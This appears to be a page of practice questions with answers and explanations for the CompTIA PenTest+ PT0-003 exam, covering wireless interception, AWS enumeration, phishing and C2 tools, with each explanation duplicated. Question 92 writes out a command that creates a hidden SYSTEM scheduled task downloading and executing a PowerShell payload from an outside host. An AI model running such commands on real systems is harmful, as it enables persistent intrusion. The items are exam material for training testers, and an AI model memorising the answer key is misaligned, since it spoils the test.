Practice Free PT0-003 Exam Online Questions
Question #91
A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.
Which of the following tools should the security professional use to best accomplish this task?
- A . Metasploit
- B . WiFi-Pumpkin
- C . SET
- D . theHarvester
- E . WiGLE.net
Correct Answer: B
B
Explanation:
WiFi-Pumpkin is used for man-in-the-middle (MitM) attacks on Wi-Fi networks, making it ideal for intercepting and accessing data.
Option A (Metasploit) ❌ : Good for exploitation, but not specialized for Wi-Fi attacks.
Option B (WiFi-Pumpkin) ✅ : Correct.
Creates fake Wi-Fi access points.
Intercepts network traffic (SSL stripping, DNS spoofing).
Option C (SET – Social Engineering Toolkit) ❌ : Focuses on phishing, not Wi-Fi attacks.
Option D (theHarvester) ❌ : Used for OSINT, not Wi-Fi exploitation.
Option E (WiGLE.net) ❌ : Maps Wi-Fi networks, but does not capture sensitive data.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Wireless Attacks & Fake APs
B
Explanation:
WiFi-Pumpkin is used for man-in-the-middle (MitM) attacks on Wi-Fi networks, making it ideal for intercepting and accessing data.
Option A (Metasploit) ❌ : Good for exploitation, but not specialized for Wi-Fi attacks.
Option B (WiFi-Pumpkin) ✅ : Correct.
Creates fake Wi-Fi access points.
Intercepts network traffic (SSL stripping, DNS spoofing).
Option C (SET – Social Engineering Toolkit) ❌ : Focuses on phishing, not Wi-Fi attacks.
Option D (theHarvester) ❌ : Used for OSINT, not Wi-Fi exploitation.
Option E (WiGLE.net) ❌ : Maps Wi-Fi networks, but does not capture sensitive data.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Wireless Attacks & Fake APs
Question #92
A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer.
The tester runs the following on the obtained shell:
schtasks /create /tn Updates /tr
"C:windowssyswow64WindowsWindowsPowerShellv1.0powershell.exe hidden -NoLogo –
NonInteractive -ep bypass -nop -c ‘IEX ((new-object
net.webclient).downloadstring(‘http://10.10.1.2/asd’))’" /sc onlogon /ru System
Which of the following does this action accomplish?
- A . Upgrades the shell performing a privilege escalation activity
- B . Uses the Windows Update service to move the shell connection and avoid detection
- C . Maintains access into the compromised computer
- D . Forwards all the communication from the compromised host to the host 10.10.1.2
Correct Answer: C
C
Explanation:
The correct answer is C. Maintains access into the compromised computer
The command uses schtasks to create a Windows scheduled task named Updates. The task is configured to run PowerShell and download/execute code from http://10.10.1.2/asd. The schedule option /sc onlogon means the task runs when a user logs on, and /ru System attempts to run it under the SYSTEM account.
This is a persistence technique. By creating a scheduled task that runs at logon, the tester can regain or maintain access after the initial shell is lost, the system reboots, or a user logs back in.
A is incorrect because the command does not directly upgrade the shell or exploit a privilege
escalation vulnerability. It creates a scheduled task for recurring execution.
B is incorrect because the task is named Updates, but it is not actually using the Windows Update service.
D is incorrect because the command downloads and executes content from 10.10.1.2; it does not configure traffic forwarding or tunneling.
In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation persistence using Windows scheduled tasks.
C
Explanation:
The correct answer is C. Maintains access into the compromised computer
The command uses schtasks to create a Windows scheduled task named Updates. The task is configured to run PowerShell and download/execute code from http://10.10.1.2/asd. The schedule option /sc onlogon means the task runs when a user logs on, and /ru System attempts to run it under the SYSTEM account.
This is a persistence technique. By creating a scheduled task that runs at logon, the tester can regain or maintain access after the initial shell is lost, the system reboots, or a user logs back in.
A is incorrect because the command does not directly upgrade the shell or exploit a privilege
escalation vulnerability. It creates a scheduled task for recurring execution.
B is incorrect because the task is named Updates, but it is not actually using the Windows Update service.
D is incorrect because the command downloads and executes content from 10.10.1.2; it does not configure traffic forwarding or tunneling.
In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation persistence using Windows scheduled tasks.
Question #93
A penetration tester compromises a developer’s workstation and believes the individual may have access to Amazon cloud compute resources.
Which of the following commands is least likely to trigger SOC detections to confirm access?
- A . aws sts get-caller-identity
- B . aws connect describe-user
- C . aws ec2 describe-instances –dry-run
- D . aws cloud9 list-environments –max-items 1
Correct Answer: C
C
Explanation:
The correct answer is C. aws ec2 describe-instances –dry-run
The tester wants to confirm whether the compromised user has access to Amazon cloud compute resources. Amazon EC2 is the primary AWS compute service, and describe-instances is used to enumerate EC2 instances.
The –dry-run option is important because it checks whether the caller has permission to perform the action without actually returning instance data. If the user has permission, AWS returns a DryRunOperation message. If the user does not have permission, AWS returns an UnauthorizedOperation message.
This makes it a lower-impact and less noisy way to validate EC2 access compared with fully enumerating cloud resources.
A is incorrect because aws sts get-caller-identity only confirms the AWS identity associated with the credentials. It does not confirm access to EC2 or other compute resources.
B is incorrect because aws connect describe-user relates to Amazon Connect, not Amazon EC2 compute access.
D is incorrect because AWS Cloud9 is a cloud-based development environment. Listing Cloud9 environments does not confirm access to EC2 production compute resources as directly as an EC2 dry-run permission check.
In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically cloud enumeration and low-impact validation of cloud permissions.
C
Explanation:
The correct answer is C. aws ec2 describe-instances –dry-run
The tester wants to confirm whether the compromised user has access to Amazon cloud compute resources. Amazon EC2 is the primary AWS compute service, and describe-instances is used to enumerate EC2 instances.
The –dry-run option is important because it checks whether the caller has permission to perform the action without actually returning instance data. If the user has permission, AWS returns a DryRunOperation message. If the user does not have permission, AWS returns an UnauthorizedOperation message.
This makes it a lower-impact and less noisy way to validate EC2 access compared with fully enumerating cloud resources.
A is incorrect because aws sts get-caller-identity only confirms the AWS identity associated with the credentials. It does not confirm access to EC2 or other compute resources.
B is incorrect because aws connect describe-user relates to Amazon Connect, not Amazon EC2 compute access.
D is incorrect because AWS Cloud9 is a cloud-based development environment. Listing Cloud9 environments does not confirm access to EC2 production compute resources as directly as an EC2 dry-run permission check.
In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically cloud enumeration and low-impact validation of cloud permissions.
Question #94
A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train.
Which of the following methods should the tester use for this task?
- A . Shoulder surfing
- B . Credential harvesting
- C . Bluetooth spamming
- D . MFA fatigue
Correct Answer: A
A
Explanation:
Shoulder surfing es el método más efectivo en este contexto. Cuando los ejecutivos trabajan en lugares públicos como trenes, un atacante puede visualizar sus pantallas sin ser detectado para recopilar datos confidenciales.
Credential harvesting requiere phishing o explotación directa. Bluetooth spamming y MFA fatigue no aplican directamente en un entorno de observación física.
Referencia: PT0-003 Objective 2.1 C Social engineering and physical observation methods.
A
Explanation:
Shoulder surfing es el método más efectivo en este contexto. Cuando los ejecutivos trabajan en lugares públicos como trenes, un atacante puede visualizar sus pantallas sin ser detectado para recopilar datos confidenciales.
Credential harvesting requiere phishing o explotación directa. Bluetooth spamming y MFA fatigue no aplican directamente en un entorno de observación física.
Referencia: PT0-003 Objective 2.1 C Social engineering and physical observation methods.
Question #95
A penetration tester wants to use PowerView in an AD environment.
Which of the following is the most likely reason?
- A . To collect local hashes
- B . To decrypt stored passwords
- C . To enumerate user groups
- D . To escalate privileges
Correct Answer: C
C
Explanation:
PowerView is a PowerShell tool used for Active Directory enumeration. It is part of the PowerSploit framework and allows penetration testers to gather detailed information about the AD environment, including user accounts, groups, computers, shares, and trust relationships.
PowerView is most commonly used to:
Enumerate domain users, groups, and memberships
Identify privileged users and group memberships
Discover domain trusts and permissions
According to the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 8 C Post-Exploitation and
Lateral Movement):
“PowerView is a post-exploitation tool used primarily for Active Directory reconnaissance, including user and group enumeration, identifying domain trusts, and mapping out the AD structure.”
Reference: CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 8
C
Explanation:
PowerView is a PowerShell tool used for Active Directory enumeration. It is part of the PowerSploit framework and allows penetration testers to gather detailed information about the AD environment, including user accounts, groups, computers, shares, and trust relationships.
PowerView is most commonly used to:
Enumerate domain users, groups, and memberships
Identify privileged users and group memberships
Discover domain trusts and permissions
According to the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 8 C Post-Exploitation and
Lateral Movement):
“PowerView is a post-exploitation tool used primarily for Active Directory reconnaissance, including user and group enumeration, identifying domain trusts, and mapping out the AD structure.”
Reference: CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 8
Question #96
During an assessment of a company, a penetration tester sends the following email to the company’s Chief Financial Officer (CFO):
Dear CFO, As we talked about during a recent meeting, please open the following attachment that contains the invoice for an existing vendor. If you do not pay this now, we will suspend the licenses for your billing system in three days.
GoPay CMS Systems Services
Which of the following techniques is this attack an example of?
- A . Whaling
- B . Phishing
- C . Spear phishing
- D . Vishing
Correct Answer: A
A
Explanation:
The correct answer is A. Whaling
Whaling is a type of phishing attack that specifically targets high-profile or senior executives, such as a CFO, CEO, CIO, or other executive-level personnel. In this scenario, the email is directed at the company’s Chief Financial Officer and uses financial pressure, urgency, and a vendor invoice theme to persuade the recipient to open an attachment or take action.
B is incorrect because phishing is a broad term for fraudulent email-based attacks, but this question specifically targets a senior executive, making whaling the better answer.
C is incorrect because spear phishing is targeted phishing against a specific person or group, but when the target is an executive-level individual such as a CFO, the more precise term is whaling.
D is incorrect because vishing involves voice-based phishing, such as phone calls or voicemail. This scenario uses email, not voice communication.
In PenTest+ terms, this falls under Attacks and Exploits, specifically social engineering, phishing techniques, and targeted executive attacks.
A
Explanation:
The correct answer is A. Whaling
Whaling is a type of phishing attack that specifically targets high-profile or senior executives, such as a CFO, CEO, CIO, or other executive-level personnel. In this scenario, the email is directed at the company’s Chief Financial Officer and uses financial pressure, urgency, and a vendor invoice theme to persuade the recipient to open an attachment or take action.
B is incorrect because phishing is a broad term for fraudulent email-based attacks, but this question specifically targets a senior executive, making whaling the better answer.
C is incorrect because spear phishing is targeted phishing against a specific person or group, but when the target is an executive-level individual such as a CFO, the more precise term is whaling.
D is incorrect because vishing involves voice-based phishing, such as phone calls or voicemail. This scenario uses email, not voice communication.
In PenTest+ terms, this falls under Attacks and Exploits, specifically social engineering, phishing techniques, and targeted executive attacks.
Question #97
A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate
is comptia.org.
Which of the following should the tester do to accomplish the assessment objective?
- A . Perform information-gathering techniques to review internet-facing assets for the company.
- B . Perform a phishing assessment to try to gain access to more resources and users’ computers.
- C . Perform a physical security review to identify vulnerabilities that could affect the company.
- D . Perform a vulnerability assessment over the main domain address provided by the client.
Correct Answer: A
A
Explanation:
An external attack surface review focuses on identifying publicly accessible assets that an attacker could exploit. The first step in this process is information gathering, which involves enumerating domains, subdomains, public IPs, DNS records, and other internet-facing resources. This is done using passive reconnaissance tools such as Whois, Shodan, Google Dorking, and OSINT techniques.
Option A is correct because it aligns with the assessment goal―finding public-facing systems and their vulnerabilities before an attacker does.
Option B (phishing assessment) is incorrect because it involves social engineering, which is not part of an external attack surface review.
Option C (physical security review) is incorrect as it pertains to physical penetration testing, not an external attack analysis.
Option D (vulnerability assessment) is incorrect because a vulnerability assessment is a later step after reconnaissance. The first step is identifying assets through information gathering.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Chapter 4 (Information Gathering and OSINT).
A
Explanation:
An external attack surface review focuses on identifying publicly accessible assets that an attacker could exploit. The first step in this process is information gathering, which involves enumerating domains, subdomains, public IPs, DNS records, and other internet-facing resources. This is done using passive reconnaissance tools such as Whois, Shodan, Google Dorking, and OSINT techniques.
Option A is correct because it aligns with the assessment goal―finding public-facing systems and their vulnerabilities before an attacker does.
Option B (phishing assessment) is incorrect because it involves social engineering, which is not part of an external attack surface review.
Option C (physical security review) is incorrect as it pertains to physical penetration testing, not an external attack analysis.
Option D (vulnerability assessment) is incorrect because a vulnerability assessment is a later step after reconnaissance. The first step is identifying assets through information gathering.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Chapter 4 (Information Gathering and OSINT).
Question #98
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands.
Which of the following techniques would the penetration tester most likely use to access the sensitive data?
- A . Logic bomb
- B . SQL injection
- C . Brute-force attack
- D . Cross-site scripting
Correct Answer: B
B
Explanation:
SQL injection (SQLi) is a technique that allows attackers to manipulate SQL queries to execute
arbitrary commands on a database. It is one of the most common and effective methods for accessing sensitive data in internal applications that accept unexpected user inputs.
Here ’ s why option B is the most likely technique:
Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. SQL injection fits this description as it exploits vulnerabilities in the application’s input handling to execute unintended SQL commands on the database.
Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server. This makes it a powerful technique for accessing sensitive information.
Common Vulnerability: SQL injection is a well-known and frequently exploited vulnerability in web applications, making it a likely technique that a penetration tester would use to exploit input handling issues in an internal application.
Reference from Pentest:
Luke HTB: This write-up demonstrates how SQL injection was used to exploit an internal application and access sensitive data. It highlights the process of identifying and leveraging SQL injection vulnerabilities to achieve data extraction.
Writeup HTB: Describes how SQL injection was utilized to gain access to user credentials and further exploit the application. This example aligns with the scenario of using SQL injection to execute arbitrary commands and access sensitive data.
Conclusion:
Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the penetration tester would use to access sensitive data. This method directly targets the input handling mechanism to manipulate SQL queries, making it the best choice.
B
Explanation:
SQL injection (SQLi) is a technique that allows attackers to manipulate SQL queries to execute
arbitrary commands on a database. It is one of the most common and effective methods for accessing sensitive data in internal applications that accept unexpected user inputs.
Here ’ s why option B is the most likely technique:
Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. SQL injection fits this description as it exploits vulnerabilities in the application’s input handling to execute unintended SQL commands on the database.
Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server. This makes it a powerful technique for accessing sensitive information.
Common Vulnerability: SQL injection is a well-known and frequently exploited vulnerability in web applications, making it a likely technique that a penetration tester would use to exploit input handling issues in an internal application.
Reference from Pentest:
Luke HTB: This write-up demonstrates how SQL injection was used to exploit an internal application and access sensitive data. It highlights the process of identifying and leveraging SQL injection vulnerabilities to achieve data extraction.
Writeup HTB: Describes how SQL injection was utilized to gain access to user credentials and further exploit the application. This example aligns with the scenario of using SQL injection to execute arbitrary commands and access sensitive data.
Conclusion:
Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the penetration tester would use to access sensitive data. This method directly targets the input handling mechanism to manipulate SQL queries, making it the best choice.
Question #99
A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target.
Which of the following should the tester use?
- A . tcprelay
- B . Bluecrack
- C . Scapy
- D . tcpdump
Correct Answer: C
C
Explanation:
Scapy is a powerful interactive Python-based packet manipulation tool used by penetration testers to create, modify, send, and analyze custom packets. It supports many protocols and allows you to set TCP flags, sequence numbers, and more.
tcprelay is used to redirect TCP traffic, not to craft packets.
Bluecrack is used for cracking Bluetooth encryption, irrelevant in this context.
tcpdump is a packet capture tool, not suitable for crafting or injecting packets.
Reference: PT0-003 Objective 3.4 C Tools for manipulating traffic, including Scapy for custom packet creation.
C
Explanation:
Scapy is a powerful interactive Python-based packet manipulation tool used by penetration testers to create, modify, send, and analyze custom packets. It supports many protocols and allows you to set TCP flags, sequence numbers, and more.
tcprelay is used to redirect TCP traffic, not to craft packets.
Bluecrack is used for cracking Bluetooth encryption, irrelevant in this context.
tcpdump is a packet capture tool, not suitable for crafting or injecting packets.
Reference: PT0-003 Objective 3.4 C Tools for manipulating traffic, including Scapy for custom packet creation.
Question #100
A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network.
Which of the following tools is the most suitable for establishing a robust and stealthy connection?
- A . ProxyChains
- B . Covenant
- C . PsExec
- D . sshuttle
Correct Answer: B
B
Explanation:
C2 servers are used to remotely control compromised systems while avoiding detection.
Covenant (Option B):
Covenant is an advanced C2 framework designed for stealthy post-exploitation in red team operations.
Supports encrypted communication, privilege escalation, and evasion techniques.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "C2 Frameworks in Post-Exploitation"
Incorrect options:
Option A (ProxyChains): Used for proxying connections, but not a C2 framework.
Option C (PsExec): A Windows command-line tool for remote execution, but not a C2 tool.
Option D (sshuttle): Used for network tunneling, not full C2.
B
Explanation:
C2 servers are used to remotely control compromised systems while avoiding detection.
Covenant (Option B):
Covenant is an advanced C2 framework designed for stealthy post-exploitation in red team operations.
Supports encrypted communication, privilege escalation, and evasion techniques.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "C2 Frameworks in Post-Exploitation"
Incorrect options:
Option A (ProxyChains): Used for proxying connections, but not a C2 framework.
Option C (PsExec): A Windows command-line tool for remote execution, but not a C2 tool.
Option D (sshuttle): Used for network tunneling, not full C2.